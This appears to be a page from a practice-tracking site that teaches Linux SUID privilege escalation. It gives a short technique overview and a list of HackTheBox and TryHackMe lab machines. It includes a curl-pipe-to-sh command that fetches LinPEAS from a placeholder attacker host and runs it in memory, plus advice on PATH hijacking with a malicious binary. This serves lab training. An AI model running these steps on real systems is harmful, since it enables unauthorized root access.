ZeroBox

Linux SUID Privilege Escalation: practice machines and key commands

A SUID binary runs with the file owner privileges, often root, so any way to make it execute your commands is a privilege escalation. List candidates with find / -perm -4000 -type f 2>/dev/null and compare them against the GTFOBins catalogue for shell escapes. Custom binaries deserve a closer look: run strings or ltrace to spot calls to commands without absolute paths, then place a malicious binary earlier in PATH. Shared library injection and writable configuration files read by the binary are other routes. Remember that some shells drop privileges unless you pass -p. Document the exact binary and version you abused. The machines listed show SUID mistakes ranging from standard utilities to hand-written programs. Run the same check after every user change, since new groups expose new binaries.

Key commands

Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

SUID Binaries Exhaustive Discovery

List all binaries on the filesystem with the SUID bit set, ignoring proc and dev.

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

LinPEAS Direct Memory Execution

Download and execute LinPEAS directly in bash memory without writing to disk.

curl -L http://{LHOST}:8000/linpeas.sh | sh

Sudo Privileges Inspection (`sudo -l`)

Check current user sudo permissions without or with password.

sudo -l

Keep going

Linux SUID Privilege Escalation machines (23)

2 of these are machines I solved myself and are listed first within each difficulty. Machines are matched by their technique tags. 23 Linux.

Very Easy (1)

MachinePlatformOSTags
OopsieHTBLinuxIDOR, SUID

Easy (12)

MachinePlatformOSTags
BankHTBLinuxExploiting-SUID-files, HTB
KoboldHTBLinuxsuid
Agent SudoTHMLinuxUser-Agent-Spoofing, Steganography, Brute-Force, CVE-2019-14287
BlunderHTBLinuxBludit-CMS, CVE-2019-14287, HTB
KenobiTHMLinuxOSCP, Samba, ProFTPD, SUID
LaboratoryHTBLinuxArbitrary-read-file, CVE-2020-10977, HTB, Marshal-cookie-attack
PreviseHTBLinuxHTB, PATH-hijacking
SecretHTBLinuxHTB, JWT-forgery, SUID
SwagShopHTBLinuxCVE-2015-1397, Exploit-modification, GTFObins, HTB
TraverxecHTBLinuxGTFOBins, HTB, SSH-Key-Cracking
VulnversityTHMLinuxOSCP, File Upload Bypass, Burp Suite, SUID
WriteupHTBLinuxHTB, Path-hijacking, Process

Medium (8)

MachinePlatformOSTags
AnonymousTHMLinuxFTP, Cron, SUID
ArchangelTHMLinuxLFI, Log-Poisoning, Cron, Path-Hijacking
Boiler CTFTHMLinuxJoomla, Sar2HTML, SUID
Brooklyn Nine NineTHMLinuxSteganography, Hydra, SUID
Jacob the BossTHMLinuxJBoss, Java-Deserialization, CVE-2017-12149, SUID
MagicHTBLinuxBasic-SQL-Injection, HTB, Path-Hijacking, SUID-Abuse
OctoberHTBLinuxBypassing-ASLR, Bypassing-NX/DEP, Exploiting-SUID-files, HTB
SneakyHTBLinuxBasic-SQL-injection, Basic-buffer-overflow, Enumerating-SNMP, Exploiting-SUID-files

Hard (2)

MachinePlatformOSTags
CharonHTBLinuxExploiting-SUID-files, HTB, Shell-command-injection, injection
Daily BugleTHMLinuxOSCP, Joomla, SQLi, CVE-2019-8942

Related techniques

Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox